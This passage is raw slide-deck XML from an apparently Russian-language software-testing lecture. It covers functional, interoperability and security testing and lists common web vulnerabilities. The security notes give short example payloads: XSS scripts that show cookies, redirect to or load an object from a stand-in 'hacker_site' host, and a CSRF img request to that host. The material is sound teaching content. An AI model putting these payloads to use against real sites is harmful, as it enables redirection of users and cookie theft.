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2"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="280" r:id="rId2"/>
    <p:sldId id="308" r:id="rId3"/>
    <p:sldId id="281" r:id="rId4"/>
    <p:sldId id="336" r:id="rId5"/>
    <p:sldId id="337" r:id="rId6"/>
    <p:sldId id="338" r:id="rId7"/>
    <p:sldId id="339" r:id="rId8"/>
    <p:sldId id="340" r:id="rId9"/>
    <p:sldId id="341" r:id="rId10"/>
    <p:sldId id="28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45E"/>
    <a:srgbClr val="F68B32"/>
    <a:srgbClr val="FFFBF7"/>
    <a:srgbClr val="FFF2E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63892" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="84" d="100"/>
          <a:sy n="84" d="100"/>
        </p:scale>
        <p:origin x="-238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1668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DCAFE-ED6D-40DE-BB2A-6C2FAE0E1B23}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11-Jan-15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B0C5A-EE92-4E92-8F5B-10699705B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603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testing.ru/testing/testcase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owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet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Группы активностей тестирования могут быть направлены на проверку работоспособности системы ( или части системы), принимая за основу различные цели и причины для тестирования.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Типы тестирования определяются целями тестирования, которые могут быть следующими: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• Функция, выполняемая программой</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>• Нефункциональная характеристика качества, такая как надежность или удобство использования </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>• Структура или архитектура программы или системы </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Подтверждение изменений, т.е. подтверждение, что дефект был исправлен (подтверждающее тестирование) и поиск непреднамеренных изменений (регрессионное тестирование)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B0C5A-EE92-4E92-8F5B-10699705BBE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Функции, которые выполняет система, подсистема или компонент, могут быть описаны в таких артефактах процесса разработки как спецификация требований, сценарии использования системы или функциональная спецификация, либо могут быть недокументированны. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Эти функции описывают, «что» эта система делает.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Функциональные тесты разрабатываются на основе функций и возможностей системы (описанных в документах или понятных </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>тестировщикам</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>) и их взаимодействия со специфичными системами и могут быть выполнены на всех уровнях тестирования (например, тесты для компонентов могут основываться на спецификациях компонентов).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С развитием сетевых технологий и интернета взаимодействие разных систем, сервисов и приложений друг с другом приобрело значительную актуальность, так как любые связанные с этим проблемы могут привести к падению авторитета компании, что как следствие повлечет за собой финансовые потери. Поэтому к тестированию взаимодействия стоит подходить со всей серьезностью.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t>Тестирование взаимодействия</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Interoperability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Testing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>) – это функциональное тестирование, проверяющее способность приложения взаимодействовать с одним и более компонентами или системами.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Программное обеспечение с хорошими характеристиками взаимодействия может быть легко интегрировано с другими системами, не требуя каких-либо серьезных модификаций. В этом случае, количество изменений и время, требуемое на их выполнение, могут быть использованы для измерения возможности взаимодействия. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t>Функциональное тестирование</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> рассматривает заранее указанное поведение и основывается на анализе спецификаций функциональности компонента или системы в целом.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Тестирование функциональности может проводиться в двух аспектах:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>требования</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>бизнес-процессы</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Тестирование в перспективе «требования» использует спецификацию функциональных требований к системе как основу для дизайна </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>тестовых случаев (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Cases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>. В этом случае необходимо сделать список того, что будет тестироваться, а что нет, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>приоритезировать</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> требования на основе рисков (если это не сделано в документе с требованиями), а на основе этого </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>приоритезировать</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> тестовые сценарии (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>cases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>). Это позволит сфокусироваться и не упустить при тестировании наиболее важный функционал.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Тестирование в перспективе «бизнес-процессы» использует знание этих самых бизнес-процессов, которые описывают сценарии ежедневного использования системы. В этой перспективе тестовые сценарии (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>scripts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>), как правило, основываются на случаях использования системы (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>cases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t>Тестирование безопасности</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> - это стратегия тестирования, используемая для проверки безопасности системы, а также для анализа рисков, связанных с обеспечением целостного подхода к защите приложения, атак хакеров, вирусов, несанкционированного доступа к конфиденциальным данным.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Общая стратегия безопасности основывается на трех основных принципах:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>конфиденциальность</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>целостность</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>доступность</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>В настоящее время наиболее распространенными видами </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t>уязвимости в безопасности программного обеспечения</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> являются:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t>XSS (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Cross-Site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> - это вид уязвимости программного обеспечения (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> приложений), при которой, на генерированной сервером странице, выполняются вредоносные </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>скрипты</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>, с целью атаки клиента.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t>XSRF / CSRF (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Forgery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> - это вид уязвимости, позволяющий использовать недостатки HTTP протокола, при этом злоумышленники работают по следующей схеме: ссылка на вредоносный сайт </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>установливается</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> на странице, пользующейся доверием у пользователя, при переходе по вредоносной ссылке выполняется </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>скрипт</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>, сохраняющий личные данные пользователя (пароли, платежные данные и т.д.), либо отправляющий СПАМ сообщения от лица пользователя, либо изменяет доступ к учетной записи пользователя, для получения полного контроля над ней.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>injections</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t> (SQL, PHP, ASP и т.д.)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> - это вид уязвимости, при котором становится возможно осуществить запуск исполняемого кода с целью получения доступа к системным ресурсам, несанкционированного доступа к данным либо выведения системы из строя.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Server-Side</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Includes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t> (SSI) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> - это вид уязвимости, использующий вставку серверных команд в HTML код или запуск их напрямую с сервера.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Authorization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Bypass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> - это вид уязвимости, при котором возможно получить несанкционированный доступ к учетной записи или документам другого пользователя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Как тестировать ПО на безопасность?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Приведем примеры тестирования ПО на предмет уязвимости в системе безопасности. Для этого Вам необходимо проверить Ваше программное обеспечение на наличия известных видов уязвимостей:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t>XSS (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Cross-Site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Сами по себе XSS атаки могут быть очень разнообразными. Злоумышленники могут попытаться украсть ваши </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>куки</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>, перенаправить вас на сайт, где произойдет более серьезная атака, загрузить в память какой-либо вредоносный объект и т.д., всего </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>навсего</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t>разместив вредоносный </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>скрипт</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> у вас на сайте. Как пример, можно рассмотреть следующий </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>скрипт</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>, выводящий на экран ваши </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>куки</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>);&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>либо </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>скрипт</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> делающий </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>редирект</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> на зараженную страницу:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>window.parent.location.href='http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>hacker_site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>';&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>либо создающий вредоносный объект с вирусом и т.п.:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>type=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>x-scriptlet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>data=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>"http://hacker_site"&gt;&lt;/object&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Для просмотра большего количества примеров рекомендуем посетить страничку: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>XSS (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Cross</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>)... </a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t>XSRF / CSRF (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Forgery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Наиболее частыми CSRF атаками являются атаки использующие HTML &lt;IMG&gt; тэг или </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> объект </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>image</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>. Чаще всего атакующий добавляет необходимый код в электронное письмо или выкладывает на </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>веб-сайт</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>, таким образом, что при загрузке страницы осуществляется запрос, выполняющий вредоносный код. Примеры:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>IMG SRC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>src=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>"http://hacker_site/?command"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>SCRIPT SRC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
